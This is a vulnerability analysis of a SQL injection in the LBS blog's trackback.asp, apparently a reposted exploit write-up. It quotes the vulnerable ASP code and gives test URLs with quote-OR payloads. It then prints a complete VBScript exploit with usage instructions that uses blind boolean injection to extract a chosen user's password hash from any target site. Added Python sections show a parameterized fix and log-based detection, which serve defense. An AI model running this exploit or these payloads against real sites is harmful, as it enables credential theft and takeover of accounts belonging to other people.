Analysis of the LBS blog trackback injection vulnerability and exploit

Source: Internet
Author: User
Injection in source/src_trackback.asp

function trackbackSave() {

    var tbEntry = {"log_id": Input["id"],
        "url": Input["url"],
        "title": Input["title"],
        "excerpt": Input["excerpt"],
        "blog": Input["blog_name"]
    };

    // These function calls look really horrible
    tbEntry.log_id = func.checkInt(tbEntry.log_id);
    tbEntry.url = func.Trim(func.wordFilter(func.checkURL(tbEntry.url)));
    tbEntry.title = func.Trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title))));
    tbEntry.excerpt = func.Trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt))));
    tbEntry.blog = func.Trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog))));

    if (tbEntry.title == "") tbEntry.title = tbEntry.url;

    // Better leave the error messages below in English
    if (!tbEntry.log_id)
        trackbackResponse(1, "invalid article ID");
    if (tbEntry.url == "")
        trackbackResponse(1, "source URL is blank");
    if (tbEntry.url == false || tbEntry.title == false || tbEntry.excerpt == false || tbEntry.blog == false)
        trackbackResponse(1, "content contains blocked words");

    var tmpA = connBlog.query("SELECT COUNT(log_id) AS i FROM blog_article WHERE log_locked=false AND log_mode<4 AND log_id=" + tbEntry.log_id);
    if (tmpA[0]["i"] == 0) trackbackResponse(1, "article does not exist or is locked");
    // title and excerpt are concatenated straight into the SQL string
    tmpA = connBlog.query("SELECT COUNT(tb_id) AS i FROM blog_trackback WHERE tb_title='" + tbEntry.title + "' AND tb_excerpt='" + tbEntry.excerpt + "'");
    if (tmpA[0]["i"] > 0) trackbackResponse(1, "trackback is already saved");

// Saving trackback

Note:

tbEntry.log_id = func.checkInt(tbEntry.log_id);
tbEntry.url = func.Trim(func.wordFilter(func.checkURL(tbEntry.url)));
tbEntry.title = func.Trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title))));
tbEntry.excerpt = func.Trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt))));
tbEntry.blog = func.Trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog))));

log_id is checked as an int by checkInt, but what about url, title, excerpt and blog? They only go through wordFilter, Trim and the HTML/UBB stripping, which deal with sensitive words and HTML and have no impact on injection. And these values come straight from

var tbEntry = {"log_id": Input["id"],
    "url": Input["url"],
    "title": Input["title"],
    "excerpt": Input["excerpt"],
    "blog": Input["blog_name"]
};

that is, straight from Input, the request parameters. Obviously, an injection!

Because of the nature of this injection (the query only returns a row count, so nothing is echoed back), we have to work with an OR condition, and since the values are quoted it is a string-type (character-type) injection.

http://127.0.0.1/aspscripts/lbs2.0.311/lbs/trackback.asp?url=1&id=1&blog_name=fffff&excerpt=1111'%20or%20'1'='1
http://127.0.0.1/aspscripts/lbs2.0.311/lbs/trackback.asp?url=1&id=1&blog_name=fffff&excerpt=1111'%20or%20'1'='2

This shows the effect: the first URL makes the duplicate check count every row, the second makes it count none.

The indicator is the response message "trackback is already saved".
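As an added illustration (not code from the original post or from LBS), the following Python reproduces the duplicate-check query from src_trackback.asp against an in-memory SQLite table and shows the same query with bound parameters, which is the fix. The table contents and the trim_html stand-in for trimHTML/trimUBB are constructed for the example.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the blog_trackback table (not the real LBS schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE blog_trackback (tb_id INTEGER PRIMARY KEY, tb_title TEXT, tb_excerpt TEXT)")
    conn.execute("INSERT INTO blog_trackback (tb_title, tb_excerpt) VALUES ('existing', 'some excerpt')")
    return conn


def trim_html(s):
    # Stand-in for func.trimHTML/trimUBB/Trim: strips tags and whitespace but,
    # like the sanitizers discussed above, leaves single quotes untouched.
    return re.sub(r"<[^>]*>", "", s).strip()


def duplicate_check_vulnerable(conn, title, excerpt):
    # Mirrors the concatenated query in src_trackback.asp; title and excerpt
    # become part of the SQL text, so a quote in either changes the WHERE clause.
    sql = ("SELECT COUNT(tb_id) AS i FROM blog_trackback WHERE tb_title='" + trim_html(title)
           + "' AND tb_excerpt='" + trim_html(excerpt) + "'")
    return conn.execute(sql).fetchone()[0]


def duplicate_check_fixed(conn, title, excerpt):
    # Same check with bound parameters: the values are never parsed as SQL.
    sql = "SELECT COUNT(tb_id) AS i FROM blog_trackback WHERE tb_title=? AND tb_excerpt=?"
    return conn.execute(sql, (trim_html(title), trim_html(excerpt))).fetchone()[0]


def trackback_message(count):
    # The boolean oracle the page describes: a non-zero count yields this message.
    return "trackback is already saved" if count > 0 else None


if __name__ == "__main__":
    db = make_db()
    for payload in ("1111' or '1'='1", "1111' or '1'='2"):
        print(repr(payload), "vulnerable:", trackback_message(duplicate_check_vulnerable(db, "1", payload)),
              "fixed:", trackback_message(duplicate_check_fixed(db, "1", payload)))
```

With the vulnerable query the two payloads from the test URLs give different messages, which is the oracle; with bound parameters both are just unmatched literals and the message never appears.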

Well, with that the exploit practically writes itself.

'================================================================================
' Usage instructions:
' At the command prompt:
'   cscript.exe lbsblog.vbs <blog path of the target site> <blog user whose password is to be cracked>
' For example:
'   cscript.exe lbsblog.vbs www.xxxx.com/bbs/boke.asp Admin
' By loveshell
'================================================================================
On Error Resume Next
Dim oArgs
Dim oLbsXml    ' XMLHTTP object used to open the target URL
Dim targetUrl  ' target URL
Dim userid     ' blog user name
Dim tempstr    ' stores the MD5 password characters obtained so far
Dim charhex    ' the hexadecimal character set
Dim charset

Set oArgs = WScript.Arguments
If oArgs.Count <> 2 Then Call showUsage()

Set oLbsXml = CreateObject("Microsoft.XMLHTTP")

' Fill in the complete target URL
targetUrl = oArgs(0)
If LCase(Left(targetUrl, 7)) <> "http://" Then targetUrl = "http://" & targetUrl
If Right(targetUrl, 1) <> "/" Then targetUrl = targetUrl & "/"
targetUrl = targetUrl & "trackback.asp"

userid = oArgs(1)
tempstr = ""
charhex = Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f", ",")

WScript.Echo "lbs blog all version exploit [new injection vulnerability]" & vbCrLf
WScript.Echo "by Jianxin" & vbCrLf
WScript.Echo "http://www.loveshell.net ~_~ I'm really bored..." & vbCrLf
WScript.Echo "+ Fuck the site now" & vbCrLf

Call Main(targetUrl, userid)

Set oLbsXml = Nothing

'---------------------------------------------- Sub -------------------------------------------------------
'======================================================
' Function name: Main
' Purpose: main program, uses the injection to obtain the password of the blog user
'======================================================
Sub Main(targetUrl, userid)
    Dim mainoffset, suboffset, templen, openUrl, getpage, postdata
    For mainoffset = 1 To 40
        For suboffset = 0 To 15
            templen = 0
            postdata = ""
            postdata = "' or (select left(user_password," & mainoffset & ") from blog_user where user_id=" & userid & ")='" & tempstr & charhex(suboffset) & "' and '1'='1"

            openUrl = targetUrl

            oLbsXml.Open "POST", openUrl, False, "", ""
            oLbsXml.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
            oLbsXml.Send "url=http://www.loveshell.net/blog/&id=1&blog_name=loveshell_is_my_hero&excerpt=fuck" & Escape(postdata)
            getpage = bytesToBstr(oLbsXml.responseBody)
            ' Determine whether the accessed page exists
            'WScript.Echo getpage
            If InStr(getpage, "trackback is already saved") <> 0 Then
                tempstr = tempstr & charhex(suboffset)
                WScript.Echo "+ crack now: " & tempstr & String(40 - mainoffset, "?")
                Exit For
            ElseIf InStr(getpage, "trackback disabled") <> 0 Then
                WScript.Echo vbCrLf & "Something error, not vul" & vbCrLf
                WScript.Quit
            End If
        Next
    Next
    WScript.Echo vbCrLf & "+ We got it: " & tempstr & vbCrLf & ":P don't be evil"
End Sub

'======================================================
' Function name: bytesToBstr
' Purpose: convert the content of the XMLHTTP response to gb2312 encoding
'======================================================
Function bytesToBstr(body)
    Dim objStream
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Mode = 3
    objStream.Open
    objStream.Write body
    objStream.Position = 0
    objStream.Type = 2
    objStream.Charset = "gb2312"
    bytesToBstr = objStream.ReadText
    objStream.Close
    Set objStream = Nothing
End Function

'==================================
' Function name: showUsage
' Purpose: usage tips
'==================================
Sub showUsage()
    WScript.Echo "lbs blog exploit" & vbCrLf & "by loveshell/Jianxin"
    WScript.Echo "Usage:" & vbCrLf & "cscript " & WScript.ScriptFullName & " TargetUrl userid"
    WScript.Echo "Example:" & vbCrLf & "cscript " & WScript.ScriptFullName & " http://www.loveshell.net/ 1"
    WScript.Echo ""
    WScript.Quit
End Sub
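As an added defender-side example (not part of the original post), the following Python runs two checks over constructed IIS-style log lines for the trackback.asp endpoint: the quote-OR shape of the test URLs above in GET query strings, and per-source-IP request bursts, since the boolean oracle in the script above needs up to 40 x 16 requests per password. The log layout and every line in it are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed IIS W3C-style lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
SAMPLE_LOG = """\
2005-03-01 10:00:01 10.0.0.5 GET /lbs/trackback.asp url=1&id=1&blog_name=f&excerpt=1111'%20or%20'1'='1 200
2005-03-01 10:00:02 10.0.0.5 GET /lbs/trackback.asp url=1&id=1&blog_name=f&excerpt=1111'%20or%20'1'='2 200
2005-03-01 10:00:03 10.0.0.5 POST /lbs/trackback.asp - 200
2005-03-01 10:00:03 10.0.0.5 POST /lbs/trackback.asp - 200
2005-03-01 10:00:04 10.0.0.5 POST /lbs/trackback.asp - 200
2005-03-01 10:05:00 192.0.2.9 POST /lbs/trackback.asp - 200
2005-03-01 10:06:00 192.0.2.9 GET /lbs/index.asp - 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")
# A closing quote followed by OR and another quote: the shape of the page's test URLs once decoded.
INJECT_RE = re.compile(r"'\s*or\s*'", re.IGNORECASE)
FIELDS = ("date", "time", "ip", "method", "stem", "query", "status")


def parse(log):
    # Yield one dict per well-formed line; malformed lines are skipped.
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield dict(zip(FIELDS, m.groups()))


def is_trackback(rec):
    return rec["stem"].lower().endswith("/trackback.asp")


def flag_injection_queries(log):
    # GET requests whose decoded query string carries the quote-OR pattern.
    # POST bodies (what the script above sends) are not in the access log, so this only sees GETs.
    return [r for r in parse(log) if is_trackback(r) and INJECT_RE.search(unquote(r["query"]))]


def flag_bursts(log, threshold):
    # Source IPs with more than `threshold` hits on trackback.asp; a legitimate trackback
    # is one request per linking post, while the blind oracle needs hundreds.
    counts = Counter(r["ip"] for r in parse(log) if is_trackback(r))
    return {ip: n for ip, n in counts.items() if n > threshold}


if __name__ == "__main__":
    for rec in flag_injection_queries(SAMPLE_LOG):
        print("injection-shaped query from", rec["ip"], unquote(rec["query"]))
    print("bursty sources:", flag_bursts(SAMPLE_LOG, 3))
```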
